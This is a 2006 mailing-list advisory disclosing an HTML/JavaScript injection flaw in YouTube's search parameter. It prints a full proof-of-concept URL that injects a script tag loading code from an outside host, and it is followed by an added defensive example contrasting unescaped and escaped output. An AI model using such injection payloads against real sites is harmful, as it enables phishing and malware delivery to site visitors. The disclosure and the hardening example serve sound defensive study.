Vulnwatch: You tube html/javascript code injection

From: <sectroyer_at_o2.pl>
Date: Thu, 08 Jun 2006 21:46:33 +0200

There exists a lack of checking in the parameters passed to the
search engine; as a result it is possible to even change the contents
of the page. A successful exploitation may not only allow executing
JS code, for instance to download trojans, but it is also possible to
use it as a phishing attack. Here is an example that illustrates the
threat:
http://www.youtube.com/results?search=gaki+no+tsuki%20%3Cimg%20src=%22http://www.danad.com.pl/pic/Zwierzeta/Kroliki/krolik%20002.jpg%22%3E%20%20%3Cscript%20src=%22http://michal.mooo.com/biuro/gora.js%22%20type=%22text/javascript%22%20language=%22JavaScript%22%3E%3C/script%3E%20%3Ca%20href=%22javascript:alert('exploited')%22%3EClick%20me%20to%20test%3C/a%3E&search_type=search_videos&search=Search
I would like to thank my precious Magdalena Pogorzelska for her support.
Regards, sectroyer (Michał Majchrowicz).
Received on Jun 12 2006
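
The missing check described in the post, shown from the defender's side as an added example (not part of the original message and not the site's code): a results page that reflects the `search` parameter, first without and then with HTML output encoding. The function names, the markup and the sample request are assumptions constructed for illustration.

```javascript
// Added example: reflecting a search term into HTML, unescaped vs. escaped.
// renderUnsafe/renderSafe and the <h1> markup are hypothetical.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode the five characters that can change HTML structure in element
// content or in a quoted attribute value.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// URLSearchParams decodes %XX and '+'; get() returns the first "search"
// value when the parameter is repeated, as it is in the posted URL.
function searchTerm(url) {
  return new URL(url).searchParams.get('search') ?? '';
}

// Vulnerable pattern: the decoded parameter is concatenated into markup,
// so any tags it carries become part of the page.
function renderUnsafe(url) {
  return `<h1>Results for ${searchTerm(url)}</h1>`;
}

// Hardened pattern: the same value is encoded at the point of output,
// so the browser displays it as text.
function renderSafe(url) {
  return `<h1>Results for ${escapeHtml(searchTerm(url))}</h1>`;
}

// Constructed request with the same shape as the one in the post; the
// host names are placeholders.
const SAMPLE_URL =
  'http://site.example/results?search=gaki+no+tsuki%20' +
  '%3Cscript%20src=%22http://cdn.example/x.js%22%3E%3C/script%3E' +
  '&search_type=search_videos&search=Search';

console.log(renderUnsafe(SAMPLE_URL));
console.log(renderSafe(SAMPLE_URL));
```

Encoding at output time, in the context where the value lands, is what closes the hole; stripping tags from the input alone leaves other contexts (attributes, script blocks, URLs) uncovered.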
